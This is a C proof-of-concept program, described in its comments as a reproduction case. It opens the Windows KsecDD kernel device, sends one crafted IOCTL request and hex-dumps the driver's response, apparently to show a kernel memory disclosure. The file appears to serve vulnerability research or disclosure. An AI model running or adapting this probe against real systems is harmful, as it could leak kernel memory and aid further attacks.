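/*
 * NOTE(review): the four #include directives on this page lost their header
 * names during extraction. The three below are the headers the visible code
 * requires (Win32 types and DeviceIoControl, the NT native declarations, and
 * printf). The fourth original header cannot be recovered from the page.
 * The build setup is not shown; the ntdll exports used here (NtOpenFile,
 * RtlInitUnicodeString) typically need ntdll.lib at link time.
 */
#include <windows.h>
#include <winternl.h>
#include <stdio.h>

/*
 * Hex-dump dwBytes bytes of Data to stdout, 16 bytes per row.
 *
 * Each row is "<8-digit hex offset>: ", then 16 two-digit hex cells ("?? " for
 * cells past the end of the data), then a 16-character ASCII column in which
 * bytes outside 0x20..0x7e (and cells past the end) are shown as '.'.
 *
 * Data     buffer to dump; a NULL pointer prints nothing.
 * dwBytes  number of valid bytes in Data.
 */
VOID PrintHex(PBYTE Data, ULONG dwBytes)
{
    if (Data == NULL) {
        return;
    }

    for (ULONG i = 0; i < dwBytes; i += 16) {
        /* Bytes left from the start of this row. Comparing j against this
         * instead of testing i + j < dwBytes keeps the bound free of wrap. */
        ULONG remaining = dwBytes - i;

        /* ULONG is unsigned long, so the conversion needs the 'l' modifier. */
        printf("%.8lx: ", (unsigned long)i);

        for (ULONG j = 0; j < 16; j++) {
            if (j < remaining) {
                printf("%.2x ", Data[i + j]);
            } else {
                printf("?? ");
            }
        }

        for (ULONG j = 0; j < 16; j++) {
            if (j < remaining && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
                printf("%c", Data[i + j]);
            } else {
                printf(".");
            }
        }

        printf("\n");

        /* Last row: stop here so that i += 16 cannot wrap around to a small
         * value and restart the dump when dwBytes is within 15 of ULONG max. */
        if (remaining <= 16) {
            break;
        }
    }
}

/*
 * Reproduction case: opens \Device\KsecDD through the native API, sends one
 * fixed request with DeviceIoControl, and hex-dumps whatever the driver
 * reports as returned.
 *
 * Returns 0 after a successful dump, 1 if the open or the ioctl fails.
 */
int main(void)
{
    HANDLE hksecdd = NULL;
    OBJECT_ATTRIBUTES objattr;
    UNICODE_STRING ksecdd_name;
    IO_STATUS_BLOCK iob;
    NTSTATUS st;

    RtlInitUnicodeString(&ksecdd_name, L"\\Device\\KsecDD");
    InitializeObjectAttributes(&objattr, &ksecdd_name, 0, NULL, NULL);

    /* Synchronous handle, so the DeviceIoControl call below completes inline
     * without an OVERLAPPED structure. */
    st = NtOpenFile(&hksecdd,
                    FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
                    &objattr,
                    &iob,
                    FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                    FILE_SYNCHRONOUS_IO_NONALERT);
    if (!NT_SUCCESS(st)) {
        /* NTSTATUS is a signed 32-bit LONG; print its bit pattern as hex. */
        printf("NtOpenFile failed, %lx\n", (unsigned long)st);
        return 1;
    }

    /*
     * Fixed request body, reproduced byte-for-byte. The field layout is not
     * documented on this page. The only part that can be read off the bytes
     * directly is the tail 33 00 44 00 45 00 53 00 00 00, which is the
     * NUL-terminated UTF-16LE string "3DES". Because the array is initialised
     * from a string literal, sizeof(InputBuffer) also counts the literal's
     * implicit trailing NUL byte.
     */
    BYTE InputBuffer[] = "\x4d\x3c\x2b\x1a\x00\x00\x02\x00\xff\xff\xff\xff\x00\x00\x00\x00\x20\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x02\x00\x00\x00\x33\x00\x44\x00\x45\x00\x53\x00\x00\x00";

    /*
     * Zero-filled before the call, so every non-zero byte in the dump was
     * written by the response and is not stale stack content. An explicit
     * { 0 } is used because an empty initializer list is not valid C11.
     */
    BYTE OutputBuffer[0x200] = { 0 /* zero padding */ };
    DWORD BytesReturned = 0;

    /*
     * Under the CTL_CODE layout, 0x390400 decodes as device type 0x39,
     * function 0x100, METHOD_BUFFERED, FILE_ANY_ACCESS.
     */
    if (!DeviceIoControl(hksecdd, 0x390400,
                         InputBuffer, sizeof(InputBuffer),
                         OutputBuffer, sizeof(OutputBuffer),
                         &BytesReturned, NULL)) {
        /* GetLastError() returns a DWORD (unsigned long). */
        printf("DeviceIoControl failed, %lu\n", (unsigned long)GetLastError());
        CloseHandle(hksecdd);
        return 1;
    }

    /* Never read past the local buffer, whatever length the driver reports. */
    DWORD DumpLen = BytesReturned;
    if (DumpLen > sizeof(OutputBuffer)) {
        DumpLen = (DWORD)sizeof(OutputBuffer);
    }

    PrintHex(OutputBuffer, DumpLen);

    CloseHandle(hksecdd);
    return 0;
}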